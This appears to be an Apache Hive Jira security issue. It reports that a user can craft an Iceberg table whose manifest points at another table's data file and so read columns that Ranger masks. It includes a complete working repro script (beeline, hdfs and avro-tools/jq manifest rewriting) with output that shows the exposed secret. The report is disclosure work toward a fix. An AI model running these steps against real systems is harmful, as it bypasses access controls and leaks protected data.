Details
-
Improvement
-
Status: Open
-
Major
-
Resolution: Unresolved
-
4.0.0-alpha-2
-
None
Description
Set to bug/blocker instead of enhancement due to its security related nature, Hive4 should not be released w/o fix for this. Please reset if needed.
Fyi: it's similar to HIVE-27322 but this is more based on Iceberg's internals and can't just be fixed via the storagehandler authorizer.
Context:
- There are some core tables with sensitive data that users can only query with data masking enforced (e.g. via Ranger). Let's assume this is the `default.icebergsecured` table.
- An end-user can only access the masked form of the sensitive data as expected...
- The users also have privilege to create new tables in their own sandbox databases - let's assume this is the `default.trojanhorse` table for now.
- The user can create a malicious table that exposes the sensitive data non-masked leading to a possible data breach.
- Hive runs with doAs=false to be able to enforce FGAC and prevent end-user direct file-system access needs
Repro:
- First make sure the data is secured by the masking policy:
<kinit as privileged user> beeline -e " DROP TABLE IF EXISTS default.icebergsecured PURGE; CREATE EXTERNAL TABLE default.icebergsecured (txt string, secret string) STORED BY ICEBERG; INSERT INTO default.icebergsecured VALUES ('You might be allowed to see this.','You are NOT allowed to see this!'); " <kinit as end user> beeline -e " SELECT * FROM default.icebergsecured; " +------------------------------------+--------------------------------+ | icebergsecured.txt | icebergsecured.secret | +------------------------------------+--------------------------------+ | You might be allowed to see this. | MASKED BY RANGER FOR SECURITY | +------------------------------------+--------------------------------+
- Now let the user to create the malicious table exposing the sensitive data:
<kinit as end user> beeline -e " DROP TABLE IF EXISTS default.trojanhorseviadata; CREATE EXTERNAL TABLE default.trojanhorseviadata (txt string, secret string) STORED BY ICEBERG LOCATION '/some-user-writeable-location/trojanhorseviadata'; INSERT INTO default.trojanhorseviadata VALUES ('placeholder','placeholder'); " SECURE_DATA_FILE=$(HADOOP_CLIENT_OPTS="-Djline.terminal=jline.UnsupportedTerminal" beeline --outputformat=csv2 --showHeader=false --verbose=false --showWarnings=false --silent=true --report=false -e "SELECT file_path FROM default.icebergsecured.files;" 2>/dev/null) TROJAN_META_LOCATION=$(HADOOP_CLIENT_OPTS="-Djline.terminal=jline.UnsupportedTerminal" beeline -e "DESCRIBE FORMATTED default.trojanhorseviadata;" 2>/dev/null |grep metadata_location |grep -v previous_metadata_location | awk '{print $5}') TROJAN_MANIFESTLIST_LOCATION=$(hdfs dfs -cat $TROJAN_META_LOCATION |grep "manifest-list" |cut -f4 -d\") hdfs dfs -get $TROJAN_MANIFESTLIST_LOCATION TROJAN_MANIFESTLIST=$(basename $TROJAN_MANIFESTLIST_LOCATION) TROJAN_MANIFESTFILE_LOCATION=$(avro-tools tojson $TROJAN_MANIFESTLIST |jq '.manifest_path' |tr -d \") hdfs dfs -get $TROJAN_MANIFESTFILE_LOCATION TROJAN_MANIFESTFILE=$(basename $TROJAN_MANIFESTFILE_LOCATION) mv ${TROJAN_MANIFESTFILE} ${TROJAN_MANIFESTFILE}.orig avro-tools tojson ${TROJAN_MANIFESTFILE}.orig |jq --arg fp "$SECURE_DATA_FILE" '.data_file.file_path = $fp' > ${TROJAN_MANIFESTFILE}.json avro-tools getschema ${TROJAN_MANIFESTFILE}.orig > ${TROJAN_MANIFESTFILE}.schema avro-tools fromjson --codec deflate --schema-file ${TROJAN_MANIFESTFILE}.schema ${TROJAN_MANIFESTFILE}.json > ${TROJAN_MANIFESTFILE}.new hdfs dfs -put -f ${TROJAN_MANIFESTFILE}.new $TROJAN_MANIFESTFILE_LOCATION beeline -e "SELECT * FROM default.trojanhorseviadata;" +------------------------------------+-----------------------------------+ | trojanhorseviadata.txt | trojanhorseviadata.secret | +------------------------------------+-----------------------------------+ | You might be allowed to see this. | You are not allowed to see this! | +------------------------------------+-----------------------------------+
There are actually multiple options to create such table and modify the manifest/list like reuse parts of the iceberg code or just use spark which needs direct end-user write access to the file-system, etc.
Attachments
Issue Links
- relates to
-
IMPALA-12584 Add backend config to restrict data file locations for Iceberg tables
- Resolved
-
HIVE-27713 Iceberg: metadata location overrides can cause data breach
- Closed
- links to